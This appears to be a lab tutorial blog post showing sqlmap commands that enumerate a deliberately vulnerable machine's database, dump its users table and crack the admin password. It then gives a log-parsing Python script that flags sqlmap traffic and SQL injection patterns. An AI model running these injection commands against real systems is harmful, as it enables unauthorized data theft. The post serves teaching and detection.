Hey everyone! This is a follow-up to the SQLi to Shell – Manual Injection tutorial. In this tutorial, I’m going to show how to use SQLMap to perform the same injection attack. I won’t be going through the entire challenge again of discovery, exploiting SQLi, and getting shell. I just want to focus on the SQL injection part, and show how much faster it can be when using a tool like SQLMap. Let’s go!
If you don’t have it running already, go ahead and fire up your SQLi2Shell machine, and make sure you have Kali running as well. In Kali, open a terminal window. This is where we’ll be typing our sqlmap commands.
We know my vulnerable URL was "http://192.168.1.187/cat.php?id=1", so we're going to use that in sqlmap.
We’ll start out again getting some basic info about the database. Let’s get the current database name, and the current database user.
Command: sqlmap -u "http://192.168.1.187/cat.php?id=1" --dbms=mysql --current-user --current-db
So we have that info, and notice how quickly SQLMap returned the data.
Next, we’ll get the table names.
Command: sqlmap -u "http://192.168.1.187/cat.php?id=1" --dbms=mysql --tables
We’re going to focus on the “users” table.
Now we want to get the column names for the “users” table.
Command: sqlmap -u "http://192.168.1.187/cat.php?id=1" --dbms=mysql -T users --columns
Extract the Data
Now that we have the column names, we need to dump all the data that’s available.
Command: sqlmap -u "http://192.168.1.187/cat.php?id=1" --dbms=mysql -T users -C login,password --dump
Perfect! Now we have the username and the password hash, and sqlmap was able to crack the hash for us, so the password is "P4ssw0rd".
You can now take this information, login to the Admin page, and continue with getting your shell on the box.
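From the other side of the wire, every one of the requests above lands in the web server's access log, and that is where this kind of run is usually caught. The script below is an added example written for this post, not sqlmap's code or anything from the SQLi2Shell box: it parses a handful of constructed combined-format log lines (the IPs, timestamps and the sqlmap version string in them are made up) and flags requests that carry sqlmap's default User-Agent banner (which begins with "sqlmap/") or whose decoded query parameters contain common injection indicators such as a stray quote, a numeric tautology or a UNION ... SELECT. The indicator list and the per-client summary are my own choices, not a standard signature set.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log lines (combined format). Not taken from the post;
# the client IPs, timestamps and the "sqlmap/1.7.2" version string are invented.
SAMPLE_LOG = """\
192.168.1.50 - - [12/Mar/2024:10:01:02 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
192.168.1.50 - - [12/Mar/2024:10:01:05 +0000] "GET /cat.php?id=2 HTTP/1.1" 200 1498 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
192.168.1.99 - - [12/Mar/2024:10:02:10 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 1532 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.168.1.99 - - [12/Mar/2024:10:02:11 +0000] "GET /cat.php?id=1%20AND%201%3D1 HTTP/1.1" 200 1532 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.168.1.99 - - [12/Mar/2024:10:02:11 +0000] "GET /cat.php?id=1%27 HTTP/1.1" 500 220 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
192.168.1.99 - - [12/Mar/2024:10:02:12 +0000] "GET /cat.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 1601 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
"""

# Apache/nginx "combined" log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators checked against each URL-decoded query parameter value.
# These are illustrative and will false-positive on some legitimate input
# (a surname with an apostrophe, for example); tune them for your application.
INJECTION_PATTERNS = [
    (re.compile(r"'"), "quote"),
    (re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I), "tautology"),
    (re.compile(r"\bunion\b.*\bselect\b", re.I | re.S), "union-select"),
    (re.compile(r"\b(sleep|benchmark)\s*\(", re.I), "time-based"),
    (re.compile(r"--|#|/\*"), "comment"),
]


def analyze(log_text):
    """Return one event dict per suspicious request, in log order."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        rec = m.groupdict()
        reasons = []

        # sqlmap's default User-Agent banner starts with "sqlmap/".
        if rec["ua"].lower().startswith("sqlmap/"):
            reasons.append("sqlmap-user-agent")

        # parse_qsl percent-decodes values once, so "%27" becomes "'" here.
        query = urlsplit(rec["path"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            for pattern, label in INJECTION_PATTERNS:
                if pattern.search(value):
                    reasons.append(f"{label}:{name}")

        if reasons:
            events.append({
                "ip": rec["ip"],
                "path": rec["path"],
                "status": rec["status"],
                "reasons": sorted(set(reasons)),
            })
    return events


def summarize(events):
    """Collapse events into {client_ip: sorted list of distinct reasons}."""
    per_ip = {}
    for event in events:
        per_ip.setdefault(event["ip"], set()).update(event["reasons"])
    return {ip: sorted(reasons) for ip, reasons in per_ip.items()}


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for event in found:
        print(f"{event['ip']} {event['status']} {event['path']} -> {', '.join(event['reasons'])}")
    print(summarize(found))
```

Two things worth noticing in the output. The very first request from the scanning host is a plain "id=1" and is flagged only by its User-Agent; that check is cheap but trivial to defeat, since sqlmap can be told to send a different agent (its --random-agent option), so the parameter-content indicators and the burst of requests with a 500 response are the signals to rely on. The real fix is still in cat.php itself: a parameterized query makes the payloads harmless, and the log check then just tells you who tried.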
That will do it for this one. I know this was a short one, but I wanted to show how simple and fast SQLMap is to use. You still need to know how to perform the attack manually, and once you have that down, feel free to bring SQLMap into the mix to get the job done faster!
Thanks for checking it out!